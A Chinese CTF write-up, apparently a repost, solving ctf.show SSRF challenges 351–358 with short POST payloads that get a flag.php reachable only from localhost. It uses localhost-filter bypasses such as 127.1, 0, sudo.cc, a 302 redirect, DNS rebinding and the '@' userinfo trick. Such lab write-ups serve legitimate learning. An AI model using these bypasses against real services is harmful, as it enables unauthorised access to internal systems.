ctf_show-php特性-351-358
2021/10/27 9:10:37
本文主要是介绍ctf_show-php特性-351-358,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
WEB 351
直接访问flag.php
显示非本地用户禁止访问,但是既然是ssrf专题,那就post url=127.0.0./flag
WEB 352
限定了协议为http或者https,同时过滤127.0.0
127.1会被解析成127.0.0.1,也就意味着为零可缺省 在Linux中,0也会被解析成127.0.0.1 127.0.0.0/8是一个环回地址网段,从127.0.0.1 ~ 127.255.255.254都表示localhost ip地址还可以通过表示成其他进制的形式访问,IP地址二进制、十进制、十六进制互换 来源于:https://blog.csdn.net/Xxy605/article/details/114988116
这里传入 url=http://127.1.1.1/flag.php
WEB 353
同上
WEB 354
过滤了0和1,这题有两种方法
一种是改本地域名的A记录到127.0.0.1上,然后访问http://域名/flag.php 即可(也可在自己域名服务器上搭建302跳转)
另一种访问suo.cc即可,suo.cc就代表着127.0.0.1
post: url=http://sudo.cc/flag.php
WEB 355
限制长度,用0即可
post:url=http://0/flag.php
也可 url=http://127.1/flag.php
//0在linux系统中会解析成127.0.0.1在windows中解析成0.0.0.0
WEB 356
长度限制为3(127.1不行了),同上
url=http://0/flag.php
WEB 357
要求是有效ip,同时不能是保留ip和私有ip。
可以用自己的域名localtion
<?php header("Location: http://127.0.0.1/flag.php");
没域名的可以用DNS重绑定漏洞,利用这个网站
看wp要放127.0.0.1再第二个
让后访问即可post url=http://r.申请的域名/flag.php
WEB 358
只能访问符合正则的url,url 字符串要以 http://ctf开头,show结尾
payload:post:http://ctf.@127.0.0.1/flag.php?show
这样解析后ctf会作为登入用户,而ip是127.0.0.1
WEB 359/360
留着后面做
这篇关于ctf_show-php特性-351-358的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-19php8的协程和hyperf的协程有什么区别?-icode9专业技术文章分享
- 2024-12-19php8 的fiber是什么?-icode9专业技术文章分享
- 2024-12-05怎么在php8,1 里面开启 debug?-icode9专业技术文章分享
- 2024-12-05怎么在php8,1 里面开启 debug?-icode9专业技术文章分享
- 2024-11-29使用PHP 将ETH账户的资产汇集到一个账户
- 2024-11-23怎么实现安卓+php 热更新方案?-icode9专业技术文章分享
- 2024-11-22PHP 中怎么实现判断多个值是否为空、null 或者为 false?-icode9专业技术文章分享
- 2024-11-11开源 PHP 商城项目 CRMEB 二次开发和部署教程
- 2024-11-09怎么使用php在kaufland平台刊登商品?-icode9专业技术文章分享
- 2024-11-05PHP的抽象类和接口是什么,有什么区别-icode9专业技术文章分享